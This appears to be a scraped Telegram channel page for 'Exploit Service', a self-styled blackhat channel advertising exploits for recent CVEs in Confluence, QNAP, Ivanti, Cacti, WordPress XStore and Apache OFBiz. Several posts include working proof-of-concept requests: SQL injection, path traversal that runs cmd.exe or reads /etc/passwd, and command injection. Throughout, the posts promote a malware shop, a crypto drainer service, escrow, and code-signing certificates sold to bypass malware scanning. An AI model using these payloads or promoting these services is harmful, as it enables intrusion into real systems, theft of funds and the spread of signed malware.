cookie

Sizning foydalanuvchi tajribangizni yaxshilash uchun cookie-lardan foydalanamiz. Barchasini qabul qiling», bosing, cookie-lardan foydalanilishiga rozilik bildirishingiz talab qilinadi.

avatar

Exploit Service

Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow

Ko'proq ko'rsatish
Reklama postlari
8 425
Obunachilar
+4924 soatlar
+2537 kunlar
+50430 kunlar

Ma'lumot yuklanmoqda...

Obunachilar o'sish tezligi

Ma'lumot yuklanmoqda...

Photo unavailableShow in Telegram
CVE-2024-21683 Confluence Data Center and Server RCE https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server/ Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
Photo unavailableShow in Telegram
👀Forget about SmartScreen👀 ⭐️[SALE 2500$ ONE-TIME 350$]⭐️ ✍️EV Code Signing ✍️ No Malware scan 🦠 Valid Sign✅ Remote Access 📡 No Smart Screen 📺 In stock - Pre-order🪤 Hot Topics🏖 https://forum.exploit.in/topic/239556 https://xss.is/threads/110863 Bot for orders🎯 https://t.me/D3Fuck_Loader_bot
Hammasini ko'rsatish...
CVE-2024-27130 RCE on a vulnerable QNAP device. https://github.com/watchtowrlabs/CVE-2024-27130 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
GitHub - watchtowrlabs/CVE-2024-27130: PoC for CVE-2024-27130

PoC for CVE-2024-27130. Contribute to watchtowrlabs/CVE-2024-27130 development by creating an account on GitHub.

Hammasini ko'rsatish...
MalwareLinks

You’ve been invited to add the folder “MalwareLinks”, which includes 38 chats.

Hammasini ko'rsatish...
Drainer Service

Crypto Drainer Service The channel joined the Malware Federation Join all channels:

https://t.me/addlist/XYbneUiAZjBiYWQ0

All Projects: @MalwareLinks

CVE-2024-33551 Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных. POC POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
added new username @exploitalert 🔥
Hammasini ko'rsatish...
CVE-2024-32113 Apache-OFBiz POC для WIN POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall> POC для *NIX POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall> Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
Photo unavailableShow in Telegram
CVE-2024-22026 Ivanti EPMM "MobileIron Core" https://github.com/securekomodo/CVE-2024-22026 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
Photo unavailableShow in Telegram
CVE-2024-29895 cacti Command injection in cmd_realtime.php https://en.fofa.info/result?qbase64=YXBwPSJDYWN0aS1Nb25pdG9yaW5nIg%3D%3D usage: http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Hammasini ko'rsatish...
Boshqa reja tanlang

Joriy rejangiz faqat 5 ta kanal uchun analitika imkoniyatini beradi. Ko'proq olish uchun, iltimos, boshqa reja tanlang.